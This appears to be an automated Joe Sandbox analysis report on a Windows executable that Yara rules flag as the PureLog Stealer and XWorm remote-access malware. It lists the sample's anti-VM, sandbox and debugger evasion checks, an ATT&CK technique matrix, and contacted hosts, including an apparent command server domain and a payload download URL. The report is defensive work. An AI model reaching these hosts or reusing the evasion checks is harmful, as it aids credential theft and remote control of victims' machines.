Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: KjCBSM7Ukv.exe PID: 6916, type: MEMORYSTR

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: KjCBSM7Ukv.exe, 00000000.00000002.1650015728.0000000002650000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE
Source: KjCBSM7Ukv.exe, 00000000.00000002.1650015728.00000000026F8000.00000004.00000800.00020000.00000000.sdmp, KjCBSM7Ukv.exe, 00000000.00000002.1650015728.00000000026E3000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.1780455840.0000000000402000.00000040.00000400.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.1781695360.0000000002FEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Memory allocated: 2250000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Memory allocated: 23E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Memory allocated: 43E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Memory allocated: 63D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Memory allocated: 5BA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Memory allocated: 1610000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Memory allocated: 2FD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Memory allocated: 4FD0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe TID: 7132	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe TID: 6032	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: cvtres.exe, 00000001.00000002.1780735464.000000000139F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
Source: Amcache.hve.4.dr	Binary or memory string: VMware
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.4.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.4.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.4.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.4.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.4.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: KjCBSM7Ukv.exe, 00000000.00000002.1648896271.0000000000728000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*
Source: Amcache.hve.4.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.4.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.4.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.4.dr	Binary or memory string: vmci.syshbin`
Source: cvtres.exe, 00000001.00000002.1781695360.0000000002FD9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: Amcache.hve.4.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.4.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: VMware20,1
Source: KjCBSM7Ukv.exe, 00000000.00000002.1650015728.0000000002650000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SerialNumber0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: Amcache.hve.4.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.4.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.4.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.4.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: KjCBSM7Ukv.exe, 00000000.00000002.1650015728.0000000002650000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual
Source: Amcache.hve.4.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.4.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.4.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Code function: 1_2_0165284C CheckRemoteDebuggerPresent,

1_2_0165284C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"

Jump to behavior

Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Queries volume information: C:\Users\user\Desktop\KjCBSM7Ukv.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.4.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.KjCBSM7Ukv.exe.39e8c18.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KjCBSM7Ukv.exe.3a10c38.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KjCBSM7Ukv.exe.5570000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KjCBSM7Ukv.exe.3ec0cb8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KjCBSM7Ukv.exe.3ec0cb8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KjCBSM7Ukv.exe.5570000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KjCBSM7Ukv.exe.3a10c38.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KjCBSM7Ukv.exe.39e8c18.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1658667016.0000000005570000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1652553493.0000000003EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1652553493.00000000037C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected XWorm

Source: Yara match	File source: 0.2.KjCBSM7Ukv.exe.276bd60.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KjCBSM7Ukv.exe.276bd60.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1780455840.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1650015728.00000000026E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1650015728.00000000026F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: KjCBSM7Ukv.exe PID: 6916, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cvtres.exe PID: 6752, type: MEMORYSTR

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.KjCBSM7Ukv.exe.39e8c18.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KjCBSM7Ukv.exe.3a10c38.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KjCBSM7Ukv.exe.5570000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KjCBSM7Ukv.exe.3ec0cb8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KjCBSM7Ukv.exe.3ec0cb8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KjCBSM7Ukv.exe.5570000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KjCBSM7Ukv.exe.3a10c38.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KjCBSM7Ukv.exe.39e8c18.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1658667016.0000000005570000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1652553493.0000000003EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1652553493.00000000037C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected XWorm

Source: Yara match	File source: 0.2.KjCBSM7Ukv.exe.276bd60.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KjCBSM7Ukv.exe.276bd60.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1780455840.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1650015728.00000000026E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1650015728.00000000026F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: KjCBSM7Ukv.exe PID: 6916, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cvtres.exe PID: 6752, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 Scheduled Task/Job	11 Process Injection	1 Masquerading	OS Credential Dumping	331 Security Software Discovery	Remote Services	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	1 Disable or Modify Tools	LSASS Memory	51 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	51 Virtualization/Sandbox Evasion	Security Account Manager	1 System Network Configuration Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	23 System Information Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Obfuscated Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
KjCBSM7Ukv.exe	14%	Virustotal		Browse
KjCBSM7Ukv.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
https://discord.com/2	0%	Virustotal	Browse
https://discord.com/9	0%	Virustotal	Browse
https://discord.com/6	0%	Virustotal	Browse
https://discord.com/	0%	Virustotal	Browse
https://www.file-drop.cc/D/6829ab/Fizvmrd.vdf	12%	Virustotal	Browse
https://discord.com/:	0%	Virustotal	Browse
https://discord.com/#	0%	Virustotal	Browse
gamemodz.duckdns.org	16%	Virustotal	Browse
https://www.file-drop.cc	12%	Virustotal	Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.file-drop.cc	172.67.146.180	true	false		unknown
ip-api.com	208.95.112.1	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
gamemodz.duckdns.org	true	16%, Virustotal, Browse	unknown
https://www.file-drop.cc/D/6829ab/Fizvmrd.vdf	false	12%, Virustotal, Browse	unknown
http://ip-api.com/line/?fields=hosting	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://ip-api.com/line/?fields=hosting6	cvtres.exe, 00000001.00000002.1780735464.000000000136A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://discord.com/2	KjCBSM7Ukv.exe	false	0%, Virustotal, Browse	unknown
https://github.com/mgravell/protobuf-neti	KjCBSM7Ukv.exe, 00000000.00000002.1661838396.0000000005A90000.00000004.08000000.00040000.00000000.sdmp	false		high
https://stackoverflow.com/q/14436606/23354	KjCBSM7Ukv.exe, 00000000.00000002.1650015728.00000000026F8000.00000004.00000800.00020000.00000000.sdmp, KjCBSM7Ukv.exe, 00000000.00000002.1661838396.0000000005A90000.00000004.08000000.00040000.00000000.sdmp	false		high
https://discord.com/6	KjCBSM7Ukv.exe	false	0%, Virustotal, Browse	unknown
https://github.com/mgravell/protobuf-netJ	KjCBSM7Ukv.exe, 00000000.00000002.1661838396.0000000005A90000.00000004.08000000.00040000.00000000.sdmp	false		high
https://discord.com/:	KjCBSM7Ukv.exe	false	0%, Virustotal, Browse	unknown
https://stackoverflow.com/q/11564914/23354;	KjCBSM7Ukv.exe, 00000000.00000002.1661838396.0000000005A90000.00000004.08000000.00040000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	KjCBSM7Ukv.exe, 00000000.00000002.1661838396.0000000005A90000.00000004.08000000.00040000.00000000.sdmp	false		high
https://discord.com/9	KjCBSM7Ukv.exe	false	0%, Virustotal, Browse	unknown
http://ip-api.com	cvtres.exe, 00000001.00000002.1781695360.000000000304C000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.1781695360.000000000305C000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.1781695360.0000000003064000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ip-api.com/line/?fields=hostingy	cvtres.exe, 00000001.00000002.1780735464.000000000136A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-net	KjCBSM7Ukv.exe, 00000000.00000002.1661838396.0000000005A90000.00000004.08000000.00040000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.4.dr	false		high
https://discord.com/	KjCBSM7Ukv.exe	false	0%, Virustotal, Browse	unknown
https://discord.com/#	KjCBSM7Ukv.exe	false	0%, Virustotal, Browse	unknown
https://www.file-drop.cc	KjCBSM7Ukv.exe, 00000000.00000002.1650015728.00000000023E1000.00000004.00000800.00020000.00000000.sdmp	false	12%, Virustotal, Browse	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	KjCBSM7Ukv.exe, 00000000.00000002.1650015728.00000000023E1000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.1781695360.000000000304C000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States		53334	TUT-ASUS	false
172.67.146.180	www.file-drop.cc	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1428548
Start date and time:	2024-04-19 07:35:11 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 0s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	KjCBSM7Ukv.exe renamed because original name is a hash value
Original Sample Name:	fe7c4b36fca4fdf53789979a4a09c880.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@4/6@2/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 91% Number of executed functions: 35 Number of non-executed functions: 3
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.182.143.212
Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target KjCBSM7Ukv.exe, PID 6916 because it is empty
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:35:59	API Interceptor	1x Sleep call for process: KjCBSM7Ukv.exe modified
07:36:12	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	eO2bqORIJb.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	SecuriteInfo.com.Win64.Evo-gen.10533.31255.exe	Get hash	malicious	Unknown	Browse	ip-api.com/json
	13w4NM6mPa.exe	Get hash	malicious	LummaC	Browse	ip-api.com/json
	mdWXrbOxsY.exe	Get hash	malicious	Xehook Stealer	Browse	ip-api.com/line/?fields=hosting
	mdWXrbOxsY.exe	Get hash	malicious	Xehook Stealer	Browse	ip-api.com/line/?fields=hosting
	Syknivkloo.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	Shipping Dcuments_CI PKL_HL_.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	ip-api.com/line/?fields=hosting
	transferencia_BBVA_97866456345354678976543425678.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	order & specification.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	ip-api.com/line/?fields=hosting
	CTM REQUEST BIRTHSHIP.doc	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
172.67.146.180	xnYuUw7KjK.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	copy#10652203.exe	Get hash	malicious	AgentTesla, AsyncRAT, PureLog Stealer	Browse
